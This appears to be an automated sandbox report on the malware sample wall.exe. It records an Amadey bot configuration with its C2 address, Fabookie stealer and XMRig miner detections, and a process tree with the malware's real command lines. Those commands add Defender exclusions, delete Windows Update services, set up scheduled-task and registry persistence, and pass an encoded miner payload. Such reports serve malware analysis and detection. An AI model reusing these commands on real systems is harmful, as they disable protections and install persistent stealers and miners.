Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/06/2023, 08:10

General

  • Target

    wall.exe

  • Size

    4.9MB

  • MD5

    014b9db957bdbafe8a48ec5cd4004f0e

  • SHA1

    44ba905cfb83b80bda92553e378eb4600acbea91

  • SHA256

    92f4134cc013553a811aa371570d7e2e66a2537b4eac3dbdeaf0cb5f02e6ec56

  • SHA512

    775e1aa3905a1d01f2ca410b4e942ac8794bef3275057821736ebea755d5315318d7e1fadaca80a1c11f7dc1d527a586748f7ba5cd7201748e431848f079aae8

  • SSDEEP

    98304:MdBY9slh4DJF1QWHc5ymiJA7MNMrL3HW4PD25u:MdBYh+WaaSrLD78

Malware Config

Extracted

Family

amadey

Version

3.67

C2

45.9.74.80/0bjdn2Z/index.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect Fabookie payload 2 IoCs
  • Fabookie

    Fabookie is facebook account info stealer.

  • Modifies security service 2 TTPs 5 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 7 IoCs
  • Downloads MZ/PE file
  • Stops running service(s) 3 TTPs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 8 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:2680
      • C:\Users\Admin\AppData\Local\Temp\wall.exe
        "C:\Users\Admin\AppData\Local\Temp\wall.exe"
        2⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:1560
        • C:\Users\Admin\AppData\Local\Temp\aafg31.exe
          "C:\Users\Admin\AppData\Local\Temp\aafg31.exe"
          3⤵
          • Executes dropped EXE
          PID:4832
        • C:\Users\Admin\AppData\Local\Temp\NewPlayer.exe
          "C:\Users\Admin\AppData\Local\Temp\NewPlayer.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2568
          • C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe
            "C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe"
            4⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:224
            • C:\Windows\SysWOW64\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe" /F
              5⤵
              • Creates scheduled task(s)
              PID:5032
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "Admin:N"&&CACLS "mnolyk.exe" /P "Admin:R" /E&&echo Y|CACLS "..\6d73a97b0c" /P "Admin:N"&&CACLS "..\6d73a97b0c" /P "Admin:R" /E&&Exit
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4508
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                6⤵
                  PID:2884
                • C:\Windows\SysWOW64\cacls.exe
                  CACLS "mnolyk.exe" /P "Admin:N"
                  6⤵
                    PID:2748
                  • C:\Windows\SysWOW64\cacls.exe
                    CACLS "mnolyk.exe" /P "Admin:R" /E
                    6⤵
                      PID:4672
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      6⤵
                        PID:3824
                      • C:\Windows\SysWOW64\cacls.exe
                        CACLS "..\6d73a97b0c" /P "Admin:N"
                        6⤵
                          PID:2116
                        • C:\Windows\SysWOW64\cacls.exe
                          CACLS "..\6d73a97b0c" /P "Admin:R" /E
                          6⤵
                            PID:3444
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
                          5⤵
                          • Loads dropped DLL
                          PID:3648
                          • C:\Windows\system32\rundll32.exe
                            "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
                            6⤵
                            • Loads dropped DLL
                            PID:2068
                            • C:\Windows\system32\WerFault.exe
                              C:\Windows\system32\WerFault.exe -u -p 2068 -s 644
                              7⤵
                              • Program crash
                              PID:4900
                    • C:\Users\Admin\AppData\Local\Temp\XandETC.exe
                      "C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
                      3⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Executes dropped EXE
                      • Drops file in Program Files directory
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2280
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1320
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2548
                  • C:\Windows\System32\cmd.exe
                    C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4972
                    • C:\Windows\System32\sc.exe
                      sc stop UsoSvc
                      3⤵
                      • Launches sc.exe
                      PID:3264
                    • C:\Windows\System32\sc.exe
                      sc stop WaaSMedicSvc
                      3⤵
                      • Launches sc.exe
                      PID:728
                    • C:\Windows\System32\sc.exe
                      sc stop wuauserv
                      3⤵
                      • Launches sc.exe
                      PID:2248
                    • C:\Windows\System32\sc.exe
                      sc stop bits
                      3⤵
                      • Launches sc.exe
                      PID:4440
                    • C:\Windows\System32\sc.exe
                      sc stop dosvc
                      3⤵
                      • Launches sc.exe
                      PID:4088
                    • C:\Windows\System32\reg.exe
                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                      3⤵
                        PID:1844
                      • C:\Windows\System32\reg.exe
                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                        3⤵
                          PID:1860
                        • C:\Windows\System32\reg.exe
                          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                          3⤵
                          • Modifies security service
                          PID:2920
                        • C:\Windows\System32\reg.exe
                          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                          3⤵
                            PID:3884
                          • C:\Windows\System32\reg.exe
                            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                            3⤵
                              PID:1200
                          • C:\Windows\System32\cmd.exe
                            C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4884
                            • C:\Windows\System32\powercfg.exe
                              powercfg /x -hibernate-timeout-ac 0
                              3⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3752
                            • C:\Windows\System32\powercfg.exe
                              powercfg /x -hibernate-timeout-dc 0
                              3⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2064
                            • C:\Windows\System32\powercfg.exe
                              powercfg /x -standby-timeout-ac 0
                              3⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4444
                            • C:\Windows\System32\powercfg.exe
                              powercfg /x -standby-timeout-dc 0
                              3⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4820
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
                            2⤵
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of WriteProcessMemory
                            PID:1176
                            • C:\Windows\system32\schtasks.exe
                              "C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
                              3⤵
                                PID:4084
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                              2⤵
                              • Drops file in System32 directory
                              • Modifies data under HKEY_USERS
                              • Suspicious behavior: EnumeratesProcesses
                              PID:2560
                            • C:\Windows\System32\cmd.exe
                              C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                              2⤵
                                PID:2096
                                • C:\Windows\System32\sc.exe
                                  sc stop UsoSvc
                                  3⤵
                                  • Launches sc.exe
                                  PID:728
                                • C:\Windows\System32\sc.exe
                                  sc stop WaaSMedicSvc
                                  3⤵
                                  • Launches sc.exe
                                  PID:4560
                                • C:\Windows\System32\sc.exe
                                  sc stop wuauserv
                                  3⤵
                                  • Launches sc.exe
                                  PID:3116
                                • C:\Windows\System32\reg.exe
                                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                  3⤵
                                    PID:5068
                                  • C:\Windows\System32\reg.exe
                                    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                    3⤵
                                      PID:2292
                                    • C:\Windows\System32\reg.exe
                                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                      3⤵
                                        PID:1560
                                      • C:\Windows\System32\reg.exe
                                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                        3⤵
                                          PID:364
                                        • C:\Windows\System32\reg.exe
                                          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                          3⤵
                                            PID:1376
                                          • C:\Windows\System32\sc.exe
                                            sc stop dosvc
                                            3⤵
                                            • Launches sc.exe
                                            PID:1664
                                          • C:\Windows\System32\sc.exe
                                            sc stop bits
                                            3⤵
                                            • Launches sc.exe
                                            PID:2304
                                        • C:\Windows\System32\cmd.exe
                                          C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                          2⤵
                                            PID:3536
                                            • C:\Windows\System32\powercfg.exe
                                              powercfg /x -hibernate-timeout-ac 0
                                              3⤵
                                                PID:3488
                                              • C:\Windows\System32\powercfg.exe
                                                powercfg /x -hibernate-timeout-dc 0
                                                3⤵
                                                  PID:1908
                                                • C:\Windows\System32\powercfg.exe
                                                  powercfg /x -standby-timeout-ac 0
                                                  3⤵
                                                    PID:836
                                                  • C:\Windows\System32\powercfg.exe
                                                    powercfg /x -standby-timeout-dc 0
                                                    3⤵
                                                      PID:748
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
                                                    2⤵
                                                    • Drops file in System32 directory
                                                    • Modifies data under HKEY_USERS
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:440
                                                  • C:\Windows\System32\conhost.exe
                                                    C:\Windows\System32\conhost.exe zuhwtyqtfkk
                                                    2⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:2420
                                                    • C:\Windows\System32\cmd.exe
                                                      C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                                      3⤵
                                                      • Drops file in Program Files directory
                                                      PID:3668
                                                  • C:\Windows\System32\cmd.exe
                                                    C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                                    2⤵
                                                    • Drops file in Program Files directory
                                                    PID:1780
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic PATH Win32_VideoController GET Name, VideoProcessor
                                                      3⤵
                                                        PID:2392
                                                    • C:\Windows\System32\conhost.exe
                                                      C:\Windows\System32\conhost.exe ozascextlcafxrlv 6E3sjfZq2rJQaxvLPmXgsH8HqLgRgcx0/LVDxBdghhCp2+hEkY7tykSHwITYgOlci3ytMC8bvXFdgLfubt31d00EGUNZvUBUebLdyQcn06lc9XyK+SQQg4bEvwPCdT2KYoSnyaznjkuq+t/WEmnCxetIZsxpO3p/zzwJI2q0v1rwbWjqgzbDndc3ETa3aKYf8EOpU9uqIUcKKIP5glSGIF5NNBIQIOxiwAszeRmTD+ssM2JwNB+ZJXRJvy123U7UEXSTx71FLoxpDYVaIMhOE++Mr3hazCz1q4t4s5o8+wL0kdpUV5VnrG7JmlnWotU5n89qBghGm+y6SMYnw4GovlYYIKPio/EJCBO4ISkMSM9oXvdK2xwDd7nOPHNI0ub2+9+yDpmbkJhXPRjLmh8EzH9no+cA8XXsDqc7l4Il6Q8HZCkxxQKp3X7QrvGtORgpsiUFRUsjuuqKF8OZDBQ643uz5XTg02QKOJfFPdU0JLRX+q6NZJdak+3EYZdI36Zgtv5L8IJAttmNYCJqIJTseVMH04bRJ5WBnXqRYehi2MM0O1YRQDI8kKVhBta2xSurnVpcEWelFYwmZuF8Vd3YhHb8yAOoY//KgjosTtbU5Co=
                                                      2⤵
                                                      • Modifies data under HKEY_USERS
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:4536
                                                  • C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe
                                                    C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe
                                                    1⤵
                                                    • Executes dropped EXE
                                                    PID:912
                                                  • C:\Program Files\Notepad\Chrome\updater.exe
                                                    "C:\Program Files\Notepad\Chrome\updater.exe"
                                                    1⤵
                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    • Drops file in Program Files directory
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:1180
                                                  • C:\Windows\system32\WerFault.exe
                                                    C:\Windows\system32\WerFault.exe -pss -s 420 -p 2068 -ip 2068
                                                    1⤵
                                                      PID:2340
                                                    • C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe
                                                      C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe
                                                      1⤵
                                                      • Executes dropped EXE
                                                      PID:1432
                                                    • C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe
                                                      C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe
                                                      1⤵
                                                      • Executes dropped EXE
                                                      PID:2176

                                                    Network

                                                    MITRE ATT&CK Enterprise v6

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\Program Files\Google\Libs\g.log

                                                      Filesize

                                                      226B

                                                      MD5

                                                      fdba80d4081c28c65e32fff246dc46cb

                                                      SHA1

                                                      74f809dedd1fc46a3a63ac9904c80f0b817b3686

                                                      SHA256

                                                      b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

                                                      SHA512

                                                      b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

                                                    • C:\Program Files\Notepad\Chrome\updater.exe

                                                      Filesize

                                                      3.7MB

                                                      MD5

                                                      3006b49f3a30a80bb85074c279acc7df

                                                      SHA1

                                                      728a7a867d13ad0034c29283939d94f0df6c19df

                                                      SHA256

                                                      f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

                                                      SHA512

                                                      e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

                                                    • C:\Program Files\Notepad\Chrome\updater.exe

                                                      Filesize

                                                      3.7MB

                                                      MD5

                                                      3006b49f3a30a80bb85074c279acc7df

                                                      SHA1

                                                      728a7a867d13ad0034c29283939d94f0df6c19df

                                                      SHA256

                                                      f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

                                                      SHA512

                                                      e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                      Filesize

                                                      2KB

                                                      MD5

                                                      d85ba6ff808d9e5444a4b369f5bc2730

                                                      SHA1

                                                      31aa9d96590fff6981b315e0b391b575e4c0804a

                                                      SHA256

                                                      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                      SHA512

                                                      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Filesize

                                                      944B

                                                      MD5

                                                      60804e808a88131a5452fed692914a8e

                                                      SHA1

                                                      fdb74669923b31d573787fe024dbd701fa21bb5b

                                                      SHA256

                                                      064fdd6e9e6e7f51da354604a56f66217f1edfc12d9bbbaf869a628915a86a61

                                                      SHA512

                                                      d4f2791433c0bacd8cad57b40fab4a807db4dd74f7c5357d2bce9aaa6544f97667497307d1e0704b98e2c99a94775fbb6ea676685a01578e4d0304f541c9854a

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Filesize

                                                      1KB

                                                      MD5

                                                      2881486cb622b49cd31ec765d5b27d95

                                                      SHA1

                                                      8875a180bf708b6c7b8eaafe00942919637994fc

                                                      SHA256

                                                      2e8161c35f5311e9b8ed8439454451e83019ee609fd819b888999a67626bd94d

                                                      SHA512

                                                      a1616f3c9826967fe0cb2bd1e74032c849c912a6ea5c7b3a272bd9d727a3ae6879968cfe296f25433b0bd3f7a1aa6eaa7fc013ef93a2fea2de09d57de7290dff

                                                    • C:\Users\Admin\AppData\Local\Temp\275444769369

                                                      Filesize

                                                      84KB

                                                      MD5

                                                      35ba5ab028d9f198a00d379e471fe37f

                                                      SHA1

                                                      897015c4f850ca6d17f66c66afd80a9a3eac5226

                                                      SHA256

                                                      eb09742574090c21d3c22d68bb81a68b8b647798437af481b1eb958c37baf525

                                                      SHA512

                                                      6dcf96f3774bdde600c4e290424ae5051ce56695aa2c04d5dc319d9cb3095c28720137988705c1f3cd60f139c5f7d66bdd11eea2533d2d3bc1e5d76c079c2db1

                                                    • C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe

                                                      Filesize

                                                      249KB

                                                      MD5

                                                      08240e71429b32855b418a4acf0e38ec

                                                      SHA1

                                                      b180ace2ea6815775d29785c985b576dc21b76b5

                                                      SHA256

                                                      a41b4591c7351562ed9125da2c93db246e87e05198d2ec0951733d1919e119d8

                                                      SHA512

                                                      69fa8cae9bf69bcc498cfd7af08fcdfd299440ba0dd679835cc8ea14f07b0346f965f88350a5261f2312e046b0dd498b8453d647b5f023762e4265ffa47472bf

                                                    • C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe

                                                      Filesize

                                                      249KB

                                                      MD5

                                                      08240e71429b32855b418a4acf0e38ec

                                                      SHA1

                                                      b180ace2ea6815775d29785c985b576dc21b76b5

                                                      SHA256

                                                      a41b4591c7351562ed9125da2c93db246e87e05198d2ec0951733d1919e119d8

                                                      SHA512

                                                      69fa8cae9bf69bcc498cfd7af08fcdfd299440ba0dd679835cc8ea14f07b0346f965f88350a5261f2312e046b0dd498b8453d647b5f023762e4265ffa47472bf

                                                    • C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe

                                                      Filesize

                                                      249KB

                                                      MD5

                                                      08240e71429b32855b418a4acf0e38ec

                                                      SHA1

                                                      b180ace2ea6815775d29785c985b576dc21b76b5

                                                      SHA256

                                                      a41b4591c7351562ed9125da2c93db246e87e05198d2ec0951733d1919e119d8

                                                      SHA512

                                                      69fa8cae9bf69bcc498cfd7af08fcdfd299440ba0dd679835cc8ea14f07b0346f965f88350a5261f2312e046b0dd498b8453d647b5f023762e4265ffa47472bf

                                                    • C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe

                                                      Filesize

                                                      249KB

                                                      MD5

                                                      08240e71429b32855b418a4acf0e38ec

                                                      SHA1

                                                      b180ace2ea6815775d29785c985b576dc21b76b5

                                                      SHA256

                                                      a41b4591c7351562ed9125da2c93db246e87e05198d2ec0951733d1919e119d8

                                                      SHA512

                                                      69fa8cae9bf69bcc498cfd7af08fcdfd299440ba0dd679835cc8ea14f07b0346f965f88350a5261f2312e046b0dd498b8453d647b5f023762e4265ffa47472bf

                                                    • C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe

                                                      Filesize

                                                      249KB

                                                      MD5

                                                      08240e71429b32855b418a4acf0e38ec

                                                      SHA1

                                                      b180ace2ea6815775d29785c985b576dc21b76b5

                                                      SHA256

                                                      a41b4591c7351562ed9125da2c93db246e87e05198d2ec0951733d1919e119d8

                                                      SHA512

                                                      69fa8cae9bf69bcc498cfd7af08fcdfd299440ba0dd679835cc8ea14f07b0346f965f88350a5261f2312e046b0dd498b8453d647b5f023762e4265ffa47472bf

                                                    • C:\Users\Admin\AppData\Local\Temp\NewPlayer.exe

                                                      Filesize

                                                      249KB

                                                      MD5

                                                      08240e71429b32855b418a4acf0e38ec

                                                      SHA1

                                                      b180ace2ea6815775d29785c985b576dc21b76b5

                                                      SHA256

                                                      a41b4591c7351562ed9125da2c93db246e87e05198d2ec0951733d1919e119d8

                                                      SHA512

                                                      69fa8cae9bf69bcc498cfd7af08fcdfd299440ba0dd679835cc8ea14f07b0346f965f88350a5261f2312e046b0dd498b8453d647b5f023762e4265ffa47472bf

                                                    • C:\Users\Admin\AppData\Local\Temp\NewPlayer.exe

                                                      Filesize

                                                      249KB

                                                      MD5

                                                      08240e71429b32855b418a4acf0e38ec

                                                      SHA1

                                                      b180ace2ea6815775d29785c985b576dc21b76b5

                                                      SHA256

                                                      a41b4591c7351562ed9125da2c93db246e87e05198d2ec0951733d1919e119d8

                                                      SHA512

                                                      69fa8cae9bf69bcc498cfd7af08fcdfd299440ba0dd679835cc8ea14f07b0346f965f88350a5261f2312e046b0dd498b8453d647b5f023762e4265ffa47472bf

                                                    • C:\Users\Admin\AppData\Local\Temp\NewPlayer.exe

                                                      Filesize

                                                      249KB

                                                      MD5

                                                      08240e71429b32855b418a4acf0e38ec

                                                      SHA1

                                                      b180ace2ea6815775d29785c985b576dc21b76b5

                                                      SHA256

                                                      a41b4591c7351562ed9125da2c93db246e87e05198d2ec0951733d1919e119d8

                                                      SHA512

                                                      69fa8cae9bf69bcc498cfd7af08fcdfd299440ba0dd679835cc8ea14f07b0346f965f88350a5261f2312e046b0dd498b8453d647b5f023762e4265ffa47472bf

                                                    • C:\Users\Admin\AppData\Local\Temp\XandETC.exe

                                                      Filesize

                                                      3.7MB

                                                      MD5

                                                      3006b49f3a30a80bb85074c279acc7df

                                                      SHA1

                                                      728a7a867d13ad0034c29283939d94f0df6c19df

                                                      SHA256

                                                      f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

                                                      SHA512

                                                      e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

                                                    • C:\Users\Admin\AppData\Local\Temp\XandETC.exe

                                                      Filesize

                                                      3.7MB

                                                      MD5

                                                      3006b49f3a30a80bb85074c279acc7df

                                                      SHA1

                                                      728a7a867d13ad0034c29283939d94f0df6c19df

                                                      SHA256

                                                      f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

                                                      SHA512

                                                      e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

                                                    • C:\Users\Admin\AppData\Local\Temp\XandETC.exe

                                                      Filesize

                                                      3.7MB

                                                      MD5

                                                      3006b49f3a30a80bb85074c279acc7df

                                                      SHA1

                                                      728a7a867d13ad0034c29283939d94f0df6c19df

                                                      SHA256

                                                      f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

                                                      SHA512

                                                      e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cjli0jpg.1sa.ps1

                                                      Filesize

                                                      60B

                                                      MD5

                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                      SHA1

